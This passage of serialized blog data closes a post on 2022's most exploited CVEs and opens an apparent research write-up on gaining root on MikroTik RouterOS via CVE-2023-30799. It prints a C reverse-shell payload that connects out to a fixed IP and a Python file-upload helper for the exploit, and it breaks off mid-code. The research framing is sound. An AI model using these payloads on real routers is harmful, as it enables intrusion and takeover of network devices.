two out of twelve).",[18,92052,92053],{},"Once again, Log4Shell is the most commonly used vulnerability by the botnets we track.",[1925,92055,92056],{},[18,92057,92058],{},"Top 12 Exploited CVE Most Used by Botnets (Botnets per CVE)",[11128,92060],{":labels":92061,":values":92062},"[\"CVE-2021-44228\",\"CVE-2022-26134\",\"CVE-2021-26084\",\"CVE-2022-1388\",\"CVE-2022-22954\"]","[7,4,3,2,2]",[61,92064,92066],{"id":92065},"current-activity-and-detections","Current Activity and Detections",[18,92068,92069,92070,92075],{},"These vulnerabilities didn’t drop off the map just because we flipped the calendar to 2023. GreyNoise provides tags for 10 of these vulnerabilities, and all but one showed active exploitation attempts in the last three days (the one “dead” tag was ",[47,92071,92074],{"href":92072,"rel":92073},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-1388",[51],"CVE-2022-1388"," - an F5 Auth bypass).",[18,92077,92078,92079,8659,92084,92089,92090,92095],{},"Given that these issues are still actively exploited, it’s not too late to start adding exploit and vulnerability detection to your network. Detections for these issues are widely available through a litany of products. We don’t play favorites, but we will share three “free” solutions:\nA combination of the ",[47,92080,92083],{"href":92081,"rel":92082},"https:\u002F\u002Frules.emergingthreats.net\u002F",[51],"Proofpoint Emerging Threats Rules",[47,92085,92088],{"href":92086,"rel":92087},"https:\u002F\u002Fwww.snort.org\u002Ffaq\u002Fwhat-are-community-rules",[51],"Snort Community Ruleset"," will give you network signature coverage for ten out of twelve of these issues.\n",[47,92091,92094],{"href":92092,"rel":92093},"https:\u002F\u002Fwww.tenable.com\u002Fproducts\u002Fnessus\u002Fnessus-essentials",[51],"Nessus Free"," covers all twelve via their plugin system. Although, free is limited to a very small number of IP addresses, so it’s likely not a long-term solution.",[61,92097,1903],{"id":1902},[18,92099,92100],{},"The 2022 Top Routinely Exploited Vulnerabilities contains no surprises. All of the top twelve are well known to exploit developers, attackers, and detection engineers. However, it’s good to remember that these vulnerabilities are not yet behind us. Attackers continue to pursue vulnerable targets, particularly older vulnerabilities, that organizations have yet to patch despite available security updates to remediate the flaws. The weaponization of these exploits will carry on until it is no longer worth the effort, underscoring the need for defensive teams to prioritize and remediate the vulnerabilities that matter most. Defenders must continue to minimize their attack surface, monitor their assets, and watch for attacks on the wire.",[61,92102,202],{"id":201},[18,92104,92105],{},"Did you find our exploit and attacker information interesting? If so, register for a VulnCheck account today by clicking “Sign in \u002F Join Community and schedule a demo.",{"title":219,"searchDepth":220,"depth":220,"links":92107},[92108,92109,92114,92115,92116],{"id":61495,"depth":220,"text":60799},{"id":22200,"depth":220,"text":91944,"children":92110},[92111,92112,92113],{"id":91950,"depth":1266,"text":331},{"id":92007,"depth":1266,"text":328},{"id":92047,"depth":1266,"text":44260},{"id":92065,"depth":220,"text":92066},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"VulnCheck provides additional insight into CISA's 2022 Top Routinely Exploited Vulnerabilities by looking at the availability of exploits and examining which threat actors, botnets, and ransomware crews used the vulnerabilities.",{"slug":92119,"sitemap":92120},"2022-top-exploited",{"videos":92121,"images":92122},[],[],"\u002Fblog\u002F2022-top-exploited",{"title":91861,"description":92117},"blog\u002F2022-top-exploited",[1279],"GKp013y3o6tZ9RPYh5HDb-mcN7uj_5xFBSU79_945sw",{"id":92129,"title":83451,"articles":92130,"authors":92199,"body":92201,"date":92134,"description":93261,"extension":234,"image":7,"link":7,"meta":93262,"navigation":237,"path":93264,"seo":93265,"series":7,"stem":93266,"subtype":7,"tags":93267,"__hash__":93268},"blog\u002Fblog\u002Fmikrotik-foisted-revisited.md",[92131,92135,92139,92143,92146,92149,92152,92155,92159,92162,92165,92168,92171,92176,92180,92184,92188,92191,92195],{"title":92132,"source":11218,"link":92133,"date":92134},"Patch Now: Up to 900K MikroTik Routers Vulnerable to Total Takeover","https:\u002F\u002Fwww.darkreading.com\u002Fvulnerabilities-threats\u002Fup-to-900k-mikrotik-routers-vulnerable-total-takeover","2023-07-25",{"title":92136,"source":73072,"link":92137,"date":92138},"Cyber Security Headlines: TETRA encryption flaws, Zenbleed strikes, Norway’s government hit with Ivanti flaw","https:\u002F\u002Fcisoseries.com\u002Fcyber-security-headlines-tetra-encryption-flaws-zenbleed-strikes-norways-government-hit-with-ivanti-flaw\u002F","2023-07-26",{"title":92140,"source":92141,"link":92142,"date":92138},"MikroTik OS bug exposes over 500,000 devices","CyberNews","https:\u002F\u002Fcybernews.com\u002Fnews\u002Fmikrotik-bug-exposes-thousands-devices\u002F",{"title":92144,"source":84069,"link":92145,"date":92138},"MikroTik vulnerability could be used to hijack 900,000 routers (CVE-2023-30799)","https:\u002F\u002Fwww.helpnetsecurity.com\u002F2023\u002F07\u002F26\u002Fcve-2023-30799\u002F",{"title":92147,"source":57680,"link":92148,"date":92138},"Over 900,000 MikroTik Routers Exposed to Critical Bug","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002F900000-mikrotik-routers-critical\u002F",{"title":92150,"source":3494,"link":92151,"date":92138},"Risky Biz News: Norwegian government hacked with MobileIron zero-day","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-norwegian-government?utm_source=post-email-title&publication_id=852612&post_id=135448192&isFreemail=true&utm_medium=email",{"title":92153,"source":11233,"link":92154,"date":92138},"Over 900K MikroTik routers vulnerable to critical bug","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fover-900k-mikrotik-routers-vulnerable-to-critical-bug",{"title":92156,"source":92157,"link":92158,"date":92138},"FLIPPER ZEROES, THE “KIA BOYS”, RFID TAGS FOR AMAZON, & PCI WIZARDRY – PSW #792","SC Media: Paul’s Security Weekly Podcast","https:\u002F\u002Fwww.scmagazine.com\u002Fpodcast-segment\u002Fflipper-zeroes-the-kia-boys-rfid-tags-for-amazon-pci-wizardry-psw-792",{"title":92160,"source":14390,"link":92161,"date":92138},"Over 500K MikroTik RouterOS systems potentially exposed to hacking due to critical flaw","https:\u002F\u002Fsecurityaffairs.com\u002F148811\u002Fhacking\u002Fmikrotik-routeros-critical-flaw.html",{"title":92163,"source":14378,"link":92164,"date":92138},"Code Execution Vulnerability Impacts 900k MikroTik Devices","https:\u002F\u002Fwww.securityweek.com\u002Fcode-execution-vulnerability-impacts-900k-mikrotik-devices\u002F",{"title":92166,"source":14382,"link":92167,"date":92138},"Critical MikroTik RouterOS Vulnerability Exposes Over Half a Million Devices to Hacking","https:\u002F\u002Fthehackernews.com\u002F2023\u002F07\u002Fcritical-mikrotik-routeros.html",{"title":92169,"source":65365,"link":92170,"date":92138},"Researchers say more than 900,000 MikroTik routers vulnerable to hackers","https:\u002F\u002Ftherecord.media\u002Fmore-than-900000-mikrotik-routers-vulnerable-to-new-bug",{"title":92172,"source":92173,"link":92174,"date":92175},"Critical Privilege Escalation Flaw Risks 900K+ MikroTik Routers","The Latest Hacking News","https:\u002F\u002Flatesthackingnews.com\u002F2023\u002F07\u002F27\u002Fcritical-privilege-escalation-flaw-risks-900k-mikrotik-routers\u002F","2023-07-27",{"title":92177,"source":89966,"link":92178,"date":92179},"July 28, 2023 – At least 8 million Americans hit in the latest MOVEit hack, and more","https:\u002F\u002Fwww.itworldcanada.com\u002Farticle\u002Fcyber-security-today-july-28-2023-at-least-8-million-americans-hit-in-the-latest-moveit-hack-and-more\u002F543783","2023-07-28",{"title":92181,"source":84069,"link":92182,"date":92183},"Week in review: Ivanti zero-day exploited, MikroTik vulnerability could compromise 900,000 routers","https:\u002F\u002Fwww.helpnetsecurity.com\u002F2023\u002F07\u002F30\u002Fweek-in-review-ivanti-zero-day-exploited-mikrotik-vulnerability-could-compromise-900000-routers\u002F","2023-07-30",{"title":92185,"source":92186,"link":92187,"date":92183},"Disruptive Chinese malware, Storm-0558 fallout and SEC cyber rules","README_","https:\u002F\u002Freadme.synack.com\u002Fdisruptive-chinese-malware-storm-0558-fallout-and-sec-cyber-rules",{"title":92189,"source":3481,"link":92190,"date":92183},"US senator victim-blames Microsoft for Chinese hack","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F07\u002F31\u002Finfosec_in_brief\u002F",{"title":92192,"source":81116,"link":92193,"date":92194},"THIS WEEK IN SECURITY: YOUR CAR’S EXTENDED WARRANTY, SEIZING THE FEDIVERSE, AND ARM MTE","https:\u002F\u002Fhackaday.com\u002F2023\u002F08\u002F04\u002Fthis-week-in-security-your-cars-extended-warranty-seizing-the-fediverse-and-arm-mte\u002F","2023-08-04",{"title":92196,"source":23286,"link":92197,"date":92198},"Your SOHO Router is a Juicy Target for Hackers","https:\u002F\u002Fsecurityboulevard.com\u002F2024\u002F08\u002Fyour-soho-router-is-a-juicy-target-for-hackers\u002F","2024-08-14",[92200],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":92202,"toc":93253},[92203,92218,92221,92253,92256,92261,92268,92273,92277,92290,92296,92299,92303,92306,92321,92327,92338,92341,92355,92361,92374,92383,92389,92392,92396,92399,92414,92417,92421,92424,92464,92492,92636,92639,92658,92661,92669,92678,92994,93001,93005,93008,93028,93045,93082,93087,93142,93151,93166,93169,93173,93176,93184,93187,93190,93214,93217,93219,93236,93247,93250],[18,92204,92205,92206,92211,92212,92217],{},"Up until version 6.49.8 (July 20, 2023), MikroTik ",[47,92207,92210],{"href":92208,"rel":92209},"https:\u002F\u002Fmikrotik.com\u002Fsoftware",[51],"RouterOS"," Long-term was vulnerable to ",[47,92213,92216],{"href":92214,"rel":92215},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-30799",[51],"CVE-2023-30799",". Remote and authenticated attackers can use the vulnerability to get a root shell on the router.",[33917,92219],{"id":92220,"title":83451},"kLC1fuGqDJY",[18,92222,92223,92224,26138,92229,92234,92235,92240,92241,92246,92247,92252],{},"CVE-2023-30799 was first disclosed, without a CVE, in ",[47,92225,92228],{"href":92226,"rel":92227},"https:\u002F\u002Frecon.cx\u002F2022\u002Fconference.html",[51],"June 2022",[47,92230,92233],{"href":92231,"rel":92232},"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=zLAQhIc7GJI",[51],"REcon"," by ",[47,92236,92239],{"href":92237,"rel":92238},"https:\u002F\u002Fmargin.re\u002F",[51],"Margin Research"," employees, Ian Dupont and ",[47,92242,92245],{"href":92243,"rel":92244},"https:\u002F\u002Ftwitter.com\u002Fhgarrereyn",[51],"Harrison Green",". At that time, they released an exploit called ",[47,92248,92251],{"href":92249,"rel":92250},"https:\u002F\u002Fgithub.com\u002FMarginResearch\u002FFOISted",[51],"FOISted"," that can obtain a root shell on the RouterOS x86 virtual machine. A CVE was assigned last week (July 19, 2023) when VulnCheck researchers published new exploits that attacked a wider range of MikroTik hardware.",[18,92254,92255],{},"MikroTik has been aware of the issue for some time. In October 2022, they fixed the problem in RouterOS stable (6.49.7). The release notes don’t indicate a security problem was addressed, but this tidbit alludes to the fix:",[1925,92257,92258],{},[18,92259,92260],{},"*) system - improved handling of user policies;",[18,92262,92263,92264,59],{},"A patch for RouterOS Long-term only arrived after VulnCheck reached out to the vendor. On July 18, VulnCheck found that RouterOS Long-term 6.48.6 (the most recent Long-term at the time) was the second most installed RouterOS version according to ",[47,92265,41731],{"href":92266,"rel":92267},"https:\u002F\u002Fwww.shodan.io\u002Fsearch\u002Ffacet?query=os%3A%22RouterOS%22&facet=os",[51],[1925,92269,92270],{},[18,92271,92272],{},"Top 10 RouterOS Versions (Shodan on July 18, 2023)",[11128,92274],{":labels":92275,":values":92276},"[\"6.49.7\",\"6.48.6\",\"6.49.6\",\"6.49.8\",\"6.47.10\",\"6.45.9\",\"6.48.3\",\"6.47.9\",\"6.49.2\"]","[168649,163274,107133,71634,47518,46751,41266,38163,35315]",[18,92278,92279,92280,982,92284,92289],{},"In total, Shodan indexes approximately ",[47,92281,84210],{"href":92282,"rel":92283},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22RouterOS+router+configuration+page%22+-%22X-Frame-Options%22++-os%3A%22MikroTik+RouterOS+6.49.7%22+-os%3A%22MikroTik+RouterOS+6.49.8%22",[51],[47,92285,92288],{"href":92286,"rel":92287},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=product%3A%22MikroTik+Winbox%22+-os%3A%22MikroTik+RouterOS+6.49.7%22+-os%3A%22MikroTik+RouterOS+6.49.8%22+",[51],"900,000"," RouterOS systems vulnerable to CVE-2023-30799 via their web and\u002For Winbox interfaces respectively.",[18,92291,92292],{},[68,92293],{":width":10862,"alt":92294,"src":92295},"Mikrotik web on Shodan","\u002Fblog\u002Fmikrotik-foisted-revisited\u002Fmt-web-shodan.png",[18,92297,92298],{},"Which means that the vulnerability could have far reaching effects.",[61,92300,92302],{"id":92301},"authentication-required-but-still-dangerous","Authentication Required, But Still Dangerous",[18,92304,92305],{},"CVE-2023-30799 does require authentication. In fact, the vulnerability itself is a simple privilege escalation from admin to “super-admin” which results in access to an arbitrary function call. But this vulnerability should not be dismissed because authentication is required. We believe that this is a dangerous vulnerability. Acquiring credentials to RouterOS systems is easier than one might expect.",[18,92307,92308,92309,92314,92315,92320],{},"RouterOS ships with a fully functional “admin” user. ",[47,92310,92313],{"href":92311,"rel":92312},"https:\u002F\u002Fwiki.mikrotik.com\u002Fwiki\u002FManual:Securing_Your_Router",[51],"Hardening guidance"," tells administrators to delete the “admin” user, but we know a large number of installations haven’t. We know this because the Winbox authentication scheme is vulnerable to a classic example of observable response discrepancy (",[47,92316,92319],{"href":92317,"rel":92318},"https:\u002F\u002Fcwe.mitre.org\u002Fdata\u002Fdefinitions\u002F204.html",[51],"CWE-204","). During authentication, RouterOS will send a smaller response when the provided username doesn’t exist.",[18,92322,92323],{},[68,92324],{":width":10862,"alt":92325,"src":92326},"Winbox responses to login attempts","\u002Fblog\u002Fmikrotik-foisted-revisited\u002Fmt-winbox-leak.png",[18,92328,92329,92330,92335,92336,4530],{},"We ",[47,92331,92334],{"href":92332,"rel":92333},"https:\u002F\u002Fgist.github.com\u002Fj-baines\u002Fc484fc2988123bc4626efea74c316615",[51],"probed"," a sample of hosts on Shodan (n=5500) and found that nearly 60% still used the default ",[886,92337,5800],{},[18,92339,92340],{},"To make matters worse, the default “admin” password is an empty string, and it wasn’t until RouterOS 6.49 (October 2021) that RouterOS started prompting administrators to update blank passwords. Even when an administrator has set a new password, RouterOS doesn’t enforce any restrictions. Administrators are free to set any password they choose, no matter how simple. That’s particularly unfortunate because the system doesn’t offer any brute force protection (except on the SSH interface).",[18,92342,92343,92344,92349,92350,92354],{},"It’s not as if brute force attacks on RouterOS are unheard of, either. There's a ",[47,92345,92348],{"href":92346,"rel":92347},"https:\u002F\u002Fhelp.mikrotik.com\u002Fdocs\u002Fdisplay\u002FROS\u002FAPI",[51],"RouterOS API"," brute forcing tool that’s over a decade old. ",[47,92351,86601],{"href":92352,"rel":92353},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Frouteros-bruteforcer-attempt?days=30",[51]," shows that RouterOS API brute forcing is incredibly active.",[18,92356,92357],{},[68,92358],{":width":10862,"alt":92359,"src":92360},"Greynoise RouterOS Bruteforcer Tag","\u002Fblog\u002Fmikrotik-foisted-revisited\u002Fgreynoise-mt-bruteforce.png",[18,92362,92363,92367,92368,92373],{},[47,92364,41731],{"href":92365,"rel":92366},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=product%3A%22MikroTik+RouterOS+API+Service%22",[51]," shows far fewer routers expose their API port (~400,000) compared to the web or Winbox interfaces, so it’s useful to note that web and Winbox brute forcing ",[47,92369,92372],{"href":92370,"rel":92371},"https:\u002F\u002Fgithub.com\u002Ftenable\u002Frouteros\u002Ftree\u002Fmaster\u002Fbrute_force",[51],"tools"," have existed since 2019. Although they became obsolete when MikroTik changed their authentication schemes around RouterOS 6.45.",[18,92375,92376,92377,92382],{},"However, because Margin Research reverse-engineered the newest web interface authentication, we are free to resume brute force activities on that interface once again. To demonstrate that, we quickly threw together a simple dictionary brute force ",[47,92378,92381],{"href":92379,"rel":92380},"https:\u002F\u002Fgithub.com\u002Fj-baines\u002Feven-you-brutus",[51],"tool"," that works against RouterOS versions up to the latest 6.x release. Below is a screenshot of the logs from an attacked router. Note that the router saw multiple login attempts every second from the same source.",[18,92384,92385],{},[68,92386],{":width":10862,"alt":92387,"src":92388},"Brute force login attempts","\u002Fblog\u002Fmikrotik-foisted-revisited\u002Fbruteforce-logs.png",[18,92390,92391],{},"All of this is to say, RouterOS suffers from a variety of issues that make guessing administrative credentials easier than it should be. We believe CVE-2023-30799 is much easier to exploit than the CVSS vector indicates.",[61,92393,92395],{"id":92394},"why-did-this-fly-under-the-radar","Why Did This Fly Under the Radar?",[18,92397,92398],{},"Margin Research’s FOISted exploit, while well done, only works on the RouterOS x86 virtual machine, which is likely the least deployed version of the software. Perhaps this is what elicited the lackluster response from the vendor. FOISted would have received more attention if it was developed for MikroTik hardware. Successful attacks on hardware are a big deal, because they have widespread real-world applications. Exploiting the x86 VM does not.",[18,92400,92401,92402,92407,92408,92413],{},"To our knowledge, there hasn’t been a public method for obtaining a root shell on MikroTik hardware for quite some time. There were several methods up until RouterOS 6.46 (2019), but they’ve all been stomped out. ",[47,92403,92406],{"href":92404,"rel":92405},"https:\u002F\u002Fteamt5.org\u002Fen\u002Fposts\u002Fvulnerability-mikrotik-cve-2021-41987\u002F",[51],"CVE-2021-41987"," was used in the wild for a time (no public exploit), but that’s been fixed for two years now. More recently, during pwn2own, DEVCORE team members popped RouterOS with ",[47,92409,92412],{"href":92410,"rel":92411},"https:\u002F\u002Fwww.zerodayinitiative.com\u002Fadvisories\u002FZDI-23-710\u002F",[51],"CVE-2023-32154",", but exploitation requires IPv6 to be enabled, and the attacker be on the same network (also no public exploit).",[18,92415,92416],{},"MIPSBE is likely the most popular architecture for MikroTik hardware (although they also have various devices that use MIPSLE, ARM, and PowerPC), so we took on the task of porting the exploit to MIPSBE.",[61,92418,92420],{"id":92419},"simplification-and-practical-issues","Simplification and Practical Issues",[18,92422,92423],{},"Our first step to porting FOISted was to simplify the exploit. This is a general outline of how FOISted x86 works:",[1789,92425,92426,92429,92458,92461],{},[25,92427,92428],{},"Upload a stage2 executable and a statically linked busybox via FTP.",[25,92430,92431,92432,92434,92435,92437,92438,982,92440,92443,92444,59,92446,92448,92449,92452,92454,92455],{},"Craft a ROP Chain:",[1823,92433],{},"a. Using a write primitive, write \u002Fflash\u002Frw\u002Fdisk\u002Fstage2 to a predefined memory location.",[1823,92436],{},"b. Calculate addresses of ",[886,92439,31890],{},[886,92441,92442],{},"execl"," in uclibc using the offsets from ",[886,92445,75402],{},[1823,92447],{},"c. ",[886,92450,92451],{},"chmod(“\u002Fflash\u002Frw\u002Fdisk\u002Fstage2”, 777)",[1823,92453],{},"d. ",[886,92456,92457],{},"execve(“\u002Fflash\u002Frw\u002Fdisk\u002Fstage2”, NULL, NULL)",[25,92459,92460],{},"Stage2 makes the uploaded busybox executable",[25,92462,92463],{},"Stage2 creates a bindshell using the uploaded busybox",[18,92465,92466,92467,92469,92470,20559,92473,14193,92476,92478,92479,92482,92483,92485,92486,92491],{},"There is a significant amount of register shuffling in order to achieve all of that. We settled on a far easier approach. We save ourselves a lot of trouble by changing the stage2 executable to a shared object. This allows us to skip ",[886,92468,31890],{},", and replace ",[886,92471,92472],{},"execve",[886,92474,92475],{},"dlopen",[886,92477,92475],{}," is referenced by the vulnerable binary (",[886,92480,92481],{},"\u002Fnova\u002Fbin\u002Fwww",") so offsets into uclibc don’t have to be calculated. We can execute arbitrary code via ",[886,92484,92475],{}," by creating a function with a ",[47,92487,92490],{"href":92488,"rel":92489},"https:\u002F\u002Fgcc.gnu.org\u002Fonlinedocs\u002Fgcc-4.7.0\u002Fgcc\u002FFunction-Attributes.html",[51],"constructor attribute",". Something like this:",[1354,92493,92496],{"className":92494,"code":92495,"language":28578,"meta":219,"style":219},"language-c shiki shiki-themes material-theme-lighter github-light github-dark monokai","#include \u003Cstdio.h>\n#include \u003Cunistd.h>\n#include \u003Cnetinet\u002Fin.h>\n#include \u003Carpa\u002Finet.h>\n#include \u003Csys\u002Fstat.h>\n#include \u003Csys\u002Ftypes.h>\n#include \u003Csys\u002Fsocket.h>\n\nstatic void before_main(void) __attribute__((constructor));\n\nstatic void before_main(void)\n{\n chmod(\"\u002Fflash\u002Frw\u002Fdisk\u002Fbusybox\", 0777);\n struct sockaddr_in sa;\n int s;\n\n sa.sin_family = AF_INET;\n sa.sin_addr.s_addr = inet_addr(\"10.12.70.252\");\n sa.sin_port = htons(1270);\n\n s = socket(AF_INET, SOCK_STREAM, 0);\n connect(s, (struct sockaddr *)&sa, sizeof(sa));\n dup2(s, 0);\n dup2(s, 1);\n dup2(s, 2);\n\n char * const argv[] = { \"\u002Fflash\u002Frw\u002Fdisk\u002Fbusybox\", \"ash\", \"-i\", NULL };\n execve(\"\u002Fflash\u002Frw\u002Fdisk\u002Fbusybox\", argv, NULL);\n}\n",[886,92497,92498,92503,92508,92513,92518,92523,92528,92533,92537,92542,92546,92551,92555,92560,92565,92570,92574,92579,92584,92589,92593,92598,92603,92608,92613,92618,92622,92627,92632],{"__ignoreMap":219},[1373,92499,92500],{"class":1375,"line":1376},[1373,92501,92502],{},"#include \u003Cstdio.h>\n",[1373,92504,92505],{"class":1375,"line":220},[1373,92506,92507],{},"#include \u003Cunistd.h>\n",[1373,92509,92510],{"class":1375,"line":1266},[1373,92511,92512],{},"#include \u003Cnetinet\u002Fin.h>\n",[1373,92514,92515],{"class":1375,"line":1852},[1373,92516,92517],{},"#include \u003Carpa\u002Finet.h>\n",[1373,92519,92520],{"class":1375,"line":4692},[1373,92521,92522],{},"#include \u003Csys\u002Fstat.h>\n",[1373,92524,92525],{"class":1375,"line":4724},[1373,92526,92527],{},"#include \u003Csys\u002Ftypes.h>\n",[1373,92529,92530],{"class":1375,"line":4756},[1373,92531,92532],{},"#include \u003Csys\u002Fsocket.h>\n",[1373,92534,92535],{"class":1375,"line":4768},[1373,92536,6520],{"emptyLinePlaceholder":237},[1373,92538,92539],{"class":1375,"line":4792},[1373,92540,92541],{},"static void before_main(void) __attribute__((constructor));\n",[1373,92543,92544],{"class":1375,"line":4798},[1373,92545,6520],{"emptyLinePlaceholder":237},[1373,92547,92548],{"class":1375,"line":4806},[1373,92549,92550],{},"static void before_main(void)\n",[1373,92552,92553],{"class":1375,"line":4817},[1373,92554,8904],{},[1373,92556,92557],{"class":1375,"line":4825},[1373,92558,92559],{}," chmod(\"\u002Fflash\u002Frw\u002Fdisk\u002Fbusybox\", 0777);\n",[1373,92561,92562],{"class":1375,"line":4835},[1373,92563,92564],{}," struct sockaddr_in sa;\n",[1373,92566,92567],{"class":1375,"line":4843},[1373,92568,92569],{}," int s;\n",[1373,92571,92572],{"class":1375,"line":4849},[1373,92573,6520],{"emptyLinePlaceholder":237},[1373,92575,92576],{"class":1375,"line":4877},[1373,92577,92578],{}," sa.sin_family = AF_INET;\n",[1373,92580,92581],{"class":1375,"line":4915},[1373,92582,92583],{}," sa.sin_addr.s_addr = inet_addr(\"10.12.70.252\");\n",[1373,92585,92586],{"class":1375,"line":4931},[1373,92587,92588],{}," sa.sin_port = htons(1270);\n",[1373,92590,92591],{"class":1375,"line":4947},[1373,92592,6520],{"emptyLinePlaceholder":237},[1373,92594,92595],{"class":1375,"line":4952},[1373,92596,92597],{}," s = socket(AF_INET, SOCK_STREAM, 0);\n",[1373,92599,92600],{"class":1375,"line":6776},[1373,92601,92602],{}," connect(s, (struct sockaddr *)&sa, sizeof(sa));\n",[1373,92604,92605],{"class":1375,"line":6781},[1373,92606,92607],{}," dup2(s, 0);\n",[1373,92609,92610],{"class":1375,"line":7524},[1373,92611,92612],{}," dup2(s, 1);\n",[1373,92614,92615],{"class":1375,"line":7530},[1373,92616,92617],{}," dup2(s, 2);\n",[1373,92619,92620],{"class":1375,"line":7546},[1373,92621,6520],{"emptyLinePlaceholder":237},[1373,92623,92624],{"class":1375,"line":7571},[1373,92625,92626],{}," char * const argv[] = { \"\u002Fflash\u002Frw\u002Fdisk\u002Fbusybox\", \"ash\", \"-i\", NULL };\n",[1373,92628,92629],{"class":1375,"line":7598},[1373,92630,92631],{}," execve(\"\u002Fflash\u002Frw\u002Fdisk\u002Fbusybox\", argv, NULL);\n",[1373,92633,92634],{"class":1375,"line":7615},[1373,92635,1855],{},[18,92637,92638],{},"With those changes, the x86 exploit is simplified to this:",[1789,92640,92641,92643,92654,92656],{},[25,92642,92428],{},[25,92644,92431,92645,92647,92648,92650,92651],{},[1823,92646],{},"a. Using a write primitive, write \u002Fflash\u002Frw\u002Fdisk\u002Fstage2 to a predefined memory location",[1823,92649],{},"b. Call ",[886,92652,92653],{},"dlopen(“\u002Fflash\u002Frw\u002Fdisk\u002Fstage2, 1)",[25,92655,92460],{},[25,92657,92463],{},[18,92659,92660],{},"There are still some issues here, though. The exploit isn’t practical for most real-world scenarios. Specifically:",[1789,92662,92663,92666],{},[25,92664,92665],{},"Most real world targets don’t expose the FTP interface.",[25,92667,92668],{},"A bindshell is typically going to be blocked\u002Ffiltered and inaccessible.",[18,92670,92671,92672,92677],{},"Both issues are fairly easy to solve. First, the RouterOS web interface allows authenticated users to upload files to a persistent storage area. Nothing is straightforward when it comes to RouterOS, but the file upload logic is fairly reasonable, and we were able to work it into Margin Research’s ",[47,92673,92676],{"href":92674,"rel":92675},"https:\u002F\u002Fgithub.com\u002FMarginResearch\u002FFOISted\u002Fblob\u002Fmaster\u002Fwebfig.py",[51],"webfig.py"," seamlessly.",[1354,92679,92681],{"className":11719,"code":92680,"language":11721,"meta":219,"style":219},"def upload(self, filename: bytes, data: bytes):\n enc = self.tx.encrypt(filename) + self.tx.encrypt(b'\\x20' * 8)\n enc = web_encode(enc)\n packed = self.tracker.pack(enc)\n param = urllib.parse.quote(packed)\n\n files = {'file': (filename, data)}\n\n r = requests.post(url = \"http:\u002F\u002F\" + self.host + \"\u002Fjsproxy\u002Fupload?\" + param, files=files)\n if r.status_code != 200:\n print(r.content)\n raise ValueError(f'Status code: {r.status_code}')\n",[886,92682,92683,92714,92769,92785,92810,92836,92840,92868,92872,92932,92950,92964],{"__ignoreMap":219},[1373,92684,92685,92687,92690,92692,92695,92697,92700,92702,92704,92706,92708,92710,92712],{"class":1375,"line":1376},[1373,92686,78600],{"class":7293},[1373,92688,92689],{"class":7297}," upload",[1373,92691,1384],{"class":1383},[1373,92693,76212],{"class":92694},"sDdYn",[1373,92696,5437],{"class":1383},[1373,92698,55713],{"class":92699},"sW6vx",[1373,92701,4606],{"class":1383},[1373,92703,57298],{"class":9165},[1373,92705,5437],{"class":1383},[1373,92707,57295],{"class":92699},[1373,92709,4606],{"class":1383},[1373,92711,57298],{"class":9165},[1373,92713,78758],{"class":1383},[1373,92715,92716,92719,92721,92724,92726,92729,92731,92733,92735,92737,92739,92741,92743,92745,92747,92749,92751,92753,92755,92757,92760,92762,92764,92767],{"class":1375,"line":220},[1373,92717,92718],{"class":4640}," enc ",[1373,92720,5417],{"class":1397},[1373,92722,92723],{"class":6761}," self",[1373,92725,59],{"class":1383},[1373,92727,92728],{"class":63570},"tx",[1373,92730,59],{"class":1383},[1373,92732,51501],{"class":11735},[1373,92734,1384],{"class":1383},[1373,92736,9588],{"class":11735},[1373,92738,2230],{"class":1383},[1373,92740,15478],{"class":1397},[1373,92742,92723],{"class":6761},[1373,92744,59],{"class":1383},[1373,92746,92728],{"class":63570},[1373,92748,59],{"class":1383},[1373,92750,51501],{"class":11735},[1373,92752,1384],{"class":1383},[1373,92754,74424],{"class":7293},[1373,92756,1388],{"class":1387},[1373,92758,92759],{"class":2326},"\\x20",[1373,92761,1388],{"class":1387},[1373,92763,19113],{"class":1397},[1373,92765,92766],{"class":5467}," 8",[1373,92768,11875],{"class":1383},[1373,92770,92771,92773,92775,92778,92780,92783],{"class":1375,"line":1266},[1373,92772,92718],{"class":4640},[1373,92774,5417],{"class":1397},[1373,92776,92777],{"class":11735}," web_encode",[1373,92779,1384],{"class":1383},[1373,92781,92782],{"class":11735},"enc",[1373,92784,11875],{"class":1383},[1373,92786,92787,92790,92792,92794,92796,92799,92801,92804,92806,92808],{"class":1375,"line":1852},[1373,92788,92789],{"class":4640}," packed ",[1373,92791,5417],{"class":1397},[1373,92793,92723],{"class":6761},[1373,92795,59],{"class":1383},[1373,92797,92798],{"class":63570},"tracker",[1373,92800,59],{"class":1383},[1373,92802,92803],{"class":11735},"pack",[1373,92805,1384],{"class":1383},[1373,92807,92782],{"class":11735},[1373,92809,11875],{"class":1383},[1373,92811,92812,92815,92817,92819,92821,92824,92826,92829,92831,92834],{"class":1375,"line":4692},[1373,92813,92814],{"class":4640}," param ",[1373,92816,5417],{"class":1397},[1373,92818,78935],{"class":4640},[1373,92820,59],{"class":1383},[1373,92822,92823],{"class":63570},"parse",[1373,92825,59],{"class":1383},[1373,92827,92828],{"class":11735},"quote",[1373,92830,1384],{"class":1383},[1373,92832,92833],{"class":11735},"packed",[1373,92835,11875],{"class":1383},[1373,92837,92838],{"class":1375,"line":4724},[1373,92839,6520],{"emptyLinePlaceholder":237},[1373,92841,92842,92845,92847,92849,92851,92853,92855,92857,92859,92861,92863,92865],{"class":1375,"line":4756},[1373,92843,92844],{"class":4640}," files 